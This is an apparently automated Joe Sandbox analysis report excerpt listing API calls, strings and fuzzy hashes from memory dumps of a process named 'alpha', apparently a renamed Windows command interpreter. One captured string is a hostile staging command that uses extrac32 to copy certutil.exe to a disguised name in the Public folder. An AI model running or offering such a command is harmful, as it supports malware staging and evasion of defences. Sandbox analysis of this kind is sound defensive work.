                                                                      • Part of subcall function 00007FF7196696E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF719669880
                                                                    • _wcsupr.MSVCRT ref: 00007FF71967B844
                                                                    • wcscmp.MSVCRT ref: 00007FF71967B86D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                    • String ID: FOR$ IF
                                                                    • API String ID: 3663254013-2924197646
                                                                    • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                    • Instruction ID: cdfa0860046334e64436de13dc9b730bdd25ed70e076fb84ed334b070602c1da
                                                                    • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                    • Instruction Fuzzy Hash: 3C515E20B09E4285EE18BF259554179A6B3AF45BB8BC84635DA1E477D5DE3CE40B8330
                                                                    APIs
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F0D6
                                                                    • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F1BA
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F1E7
                                                                    • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F1FF
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F2BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$iswspacewcschr
                                                                    • String ID: )$=,;
                                                                    • API String ID: 1959970872-2167043656
                                                                    • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                    • Instruction ID: 2ae04fc710f0b1ecb31dcd7f22d39e742280336c229acbf1d57c04e784de1850
                                                                    • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                    • Instruction Fuzzy Hash: 92419E66E08E5286FB64AF15E514379E6F2BF507B9FC45035C98D421A4DF3CA88B8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                    • String ID: %04X-%04X$:
                                                                    • API String ID: 930873262-1938371929
                                                                    • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                    • Instruction ID: 4ee21dc87804810fef44cc7c021f6b0a5017c6dbe2311c67093aba2c75a46678
                                                                    • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                    • Instruction Fuzzy Hash: 7F416031A08F82D6EB24AF60E4412BAE276EB84768FC04136D95E436D5DF3CD54AD731
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                    • API String ID: 3249344982-2616576482
                                                                    • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                    • Instruction ID: 6a621719b7e70e3973a7541f161f97d2a9532ea27f89d3afada338b7c0aaa6e9
                                                                    • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                    • Instruction Fuzzy Hash: A7416072618F418AE3109F12A844769FAB5FB49FE8F845234DA4E07794DF3CD05ACB24
                                                                    APIs
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676A73
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676A91
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676AB0
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676AE3
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676B01
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$iswdigit
                                                                    • String ID: +-~!$<>+-*/%()|^&=,
                                                                    • API String ID: 2770779731-632268628
                                                                    • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                    • Instruction ID: f1c36c40c73135e54b91357b9d1f5119ebb78a65313fc49b3cccb593b47b59fd
                                                                    • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                    • Instruction Fuzzy Hash: 8C314C22608E56C5EA58AF01E450278B7B1FB49F99B858076DA5E03354EF3CE85AC331
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                    • String ID:
                                                                    • API String ID: 3192234081-0
                                                                    • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                    • Instruction ID: 33099f4988cc292db9d771f041e2de4ecbd27b46f75ce323f1632a301654bd65
                                                                    • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                    • Instruction Fuzzy Hash: 40318131608E41CBE714AF21A41567DFBB2FB89BA8F849534DE5A47795CE3CD40A8B20
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF719671673
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF71967168D
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF719671757
                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF71967176E
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF719671788
                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF71967179C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Size
                                                                    • String ID:
                                                                    • API String ID: 3586862581-0
                                                                    • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                    • Instruction ID: b310d3f0c013ac3e2f5b8298ad9be5bd9efb66de6142e84b1fdb47d57342b627
                                                                    • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                    • Instruction Fuzzy Hash: C1917162A09F42D1EA18AF15E450278E6B3FB54FA8F954536CA5D077A0DF3CE44AC330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                    • String ID:
                                                                    • API String ID: 1313749407-0
                                                                    • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                    • Instruction ID: 22ace1b18f9ace76f2e6f82490095760a9148e26e21d6a8627d1dab151fd5ac3
                                                                    • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                    • Instruction Fuzzy Hash: 3451B121A08F8292EA14BF119454179E6B7BF49BB8F885270DD1E073C5DF3CE84B8630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                    • String ID:
                                                                    • API String ID: 920682188-0
                                                                    • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                    • Instruction ID: d64b4348415c3aa9a33a18c37ee93918d2fb2dbc9f05686ea9b775fcf8d48fa8
                                                                    • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                    • Instruction Fuzzy Hash: 73512936705B818AEB25EF20D8546E8B7A2FB88B58F449035CA4E47754EF3CD64A8720
                                                                    APIs
                                                                    Strings
                                                                    • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF71966E00B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess_setjmp
                                                                    • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                    • API String ID: 777023205-3344945345
                                                                    • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                    • Instruction ID: d22f3f7bac16becf16e2a409bbdcfc494a11daff7a2d82a9fe74c025fbe5a632
                                                                    • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                    • Instruction Fuzzy Hash: C9514930E0DE4289E611EF15A850138F6B2BF58BB8FD44436DA0D463A1DF3DA45B8631
                                                                    APIs
                                                                    • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F1BA
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F1E7
                                                                    • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F1FF
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F2BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$iswspacewcschr
                                                                    • String ID: )$=,;
                                                                    • API String ID: 1959970872-2167043656
                                                                    • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                    • Instruction ID: aef37250b0be670630962aeb2e229f29ca26a6112b6dbd00d44432d3ff7f7fc2
                                                                    • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                    • Instruction Fuzzy Hash: F1416A75E08E5386FB64AF16D514279E6B2AF20BBCFC45035C98D021A4DF3CA84F8671
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmpfprintfwcsrchr
                                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                                    • API String ID: 3625580822-2781220306
                                                                    • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                    • Instruction ID: f9916045c6194bf5298f7393bbc980aa4044d116b0ddce790132641540db381f
                                                                    • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                    • Instruction Fuzzy Hash: 4B318E21A18B46C6EA18AF42A5111B9F2B6BB45BBCF845134DE1D177A5DE3CE44BC330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcsspn
                                                                    • String ID:
                                                                    • API String ID: 3809306610-0
                                                                    • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                    • Instruction ID: 776940f243616930fd5b26b77b94383c3eeee77ef332260709ef27d964b82248
                                                                    • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                    • Instruction Fuzzy Hash: 96B18E72A08E4285EA14EF15E450679A7B2FB55BA8FC58031DA4E477A0DF7CE84BC730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$iswdigit$wcstol
                                                                    • String ID:
                                                                    • API String ID: 3841054028-0
                                                                    • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                    • Instruction ID: ff72c6c07db3b7c9b4864a4057d1f34378f3142f1509972714154e5e187c9606
                                                                    • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                    • Instruction Fuzzy Hash: A451A526904B52C6EB64AF15A4011B9E6B2FF68778BC48131DE6D422D4DF3CA85BC331
                                                                    APIs
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719683687
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF7196836A6
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF7196836EB
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719683703
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF719683722
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Write_get_osfhandle$Mode
                                                                    • String ID:
                                                                    • API String ID: 1066134489-0
                                                                    • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                    • Instruction ID: e10654dc382e693f005aab68b498d2478203e5c1df858e7b287424a041fa1a25
                                                                    • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                    • Instruction Fuzzy Hash: 3C519561B08B42D7EA286F159505979E6B2FF44BB8F884535DE0A037A1DF3CE44ACB30
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
